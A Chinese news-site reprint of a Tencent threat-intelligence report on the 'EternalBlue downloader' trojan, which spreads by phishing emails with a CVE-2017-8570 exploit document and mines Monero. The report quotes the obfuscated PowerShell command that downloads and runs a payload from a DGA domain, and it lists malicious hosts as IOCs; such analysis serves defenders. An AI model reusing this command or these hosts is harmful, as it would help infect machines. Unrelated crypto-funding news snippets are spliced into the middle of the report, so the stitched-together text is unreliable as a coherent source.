来源:腾讯御见威胁情报中心
编者注:原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播,附件含CVE-2017-8570漏洞攻击代码》
“永恒之蓝”下载器木马在感染用户机器上运行后,会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档,该文档附带CVE-2017-8570漏洞攻击代码。
如果被攻击用户收到邮件并不慎打开文档,就可能触发漏洞执行Powershell命令下载mail.jsp:
Hashed联合创始人Alex Shin将加入Mysten Labs CEO的Web3基金:3月2日消息,Hashed联合创始人AlexShin和资深对冲基金投资者Sandeep Ramesh将作为普通合伙人加入Mysten Labs首席执行官Evan Cheng新创立的Web3风险基金。
金色财经此前报道,Sui开发公司Mysten Labs首席执行官寻求为一个Web3基金筹集超1亿美元资金,该基金将不限于Sui生态。(TheBlock)[2023/3/2 12:37:43]
C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)
Hashed联合创始人:Web 2公司向Web 3转移以寻找更多机会:金色财经联合Coinlive现场报道,“Token 2049”峰会活动在新加坡举办,在题为 \"洞察整个亚洲加密货币格局 \"的圆桌讨论中,Hashed的联合创始人兼合伙人Ryan Kim解释说,韩国的Web 2投资相当繁荣,现在Web 2公司有意向Web 3转移,以寻找更多机会。游戏开发商、3A工作室和科技巨头都在制作好的、合法的项目。他预见到这两年会有更多的机会。最近发生的一个有趣的项目是一个去中心化的K-pop团体,大多数投资者对其感兴趣。粉丝们可以通过铸造NFT和投票来参与他们喜欢的团体的旅程。[2022/9/29 6:02:19]
而下载使用的域名ap35nf7.jp实际上并没有注册,但是依然能够解析到地址:t.awcna.com,是因为被感染机器的本地hosts文件被篡改,使得随机生成的域名映射到木马使用的恶意地址,细节请参考御见威胁情报中心此前发布的报告:《“永恒之蓝下载器”木马篡改hosts指向随机域名,再用多个漏洞攻击内网挖矿》。
Apeiron完成1000万美元种子轮融资,Hashed领投:4月25日消息,NFT链游Apeiron已完成1000万美元种子轮融资,韩国区块链投资公司Hashed领投,DeFianceCapital、MorningstarVentures、SpartanGroup和De-FiCapital等风险投资公司参投。
Apeiron玩家将扮演神灵,并使用基于卡牌的实时战斗系统参与对战,该游戏由FoonieMagus开发,迄今总计募集到约1750万美元资金,包括300万美元pre-seed轮融资、1000万美元种子轮融资、以及450万美元NFT销售。(Bitcoin.com)[2022/4/25 14:48:21]
本次攻击过程中,木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名,并在hosts文件中指向域名:
t.tr2q.com,t.awcna.com,t.amynx.com
mail.jsp经过高度混淆,多次解密后可以看到其安装多个计划任务下载Powershell脚本执行,并使用了新的计划任务名:
“Bluetea“蓝茶。
“永恒之蓝”下载器木马自出现之后从未停止更新,从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀,并且通过安装多个类型的计划任务进行持久化。在传播方式上,最初通过供应链攻击积累一批感染机器后,又不断利用”永恒之蓝”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法进行扩散传播,近期又增加了DGA域名攻击和钓鱼邮件攻击,其最终目的只为利用用户机器挖矿门罗币获利。
永恒之蓝下载器木马的历次版本更新参考下表:
安全建议
1.建议用户不要轻易打开不明来源的邮件附件,对于邮件附件中的文件要格外谨慎运行,如发现有脚本或其他可执行文件可先使用杀软件进行扫描;
2.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP账号密码,切勿使用弱口令,避免遭遇弱密码爆破攻击;
3.根据微软安全公告及时修复Office漏洞CVE-2017-8570,需进行漏洞扫描和修复,或采用WindowsUpdate进行。
IOCs
http//t.awcna.com/mail.jsp
来源:国家治理周刊 编者注:原标题为《区块链技术在突发性公共安全事件中的应用前景》3月29日至4月1日.
来源:互链脉搏 作者:金走车 近期,国内区块链标准建设提速。4月以来,2项区块链国家标准获批立项;1项防伪溯源类国家标准对区块链在该领域的应用做了明确要求;1项“区块链+疫情防控”省级地方标准获.
4月9日,中共中央、国务院下发《关于构建更加完善的要素市场化配置体制机制的意见》,这是中央出台的第一份要素市场化配置文件,数据首次正式被纳入生产要素范围.
原文:https://www.theblockcrypto.com/post/60702/??翻译:律动BlockBeats拜拜Maker基金会(MakerFoundation)透露.
面对币价不振与BTC减半压力,加密货币矿业正在迎来新一轮的动荡与洗牌。吴说区块链独家获悉,万有算力旗下百特矿池近日正在清退中,算力已经从3月初的4000多P跌至目前的约200P,矿工得到通知转移.
作者:魏亮?查选 来源:中国电子银行网 编者注:原标题为《区块链基础设施安全风险及评估探索》摘要:区块链技术凭借抗篡改、透明化、分布式的安全特性已成为近年来全球科技和经济发展新热点.
链资讯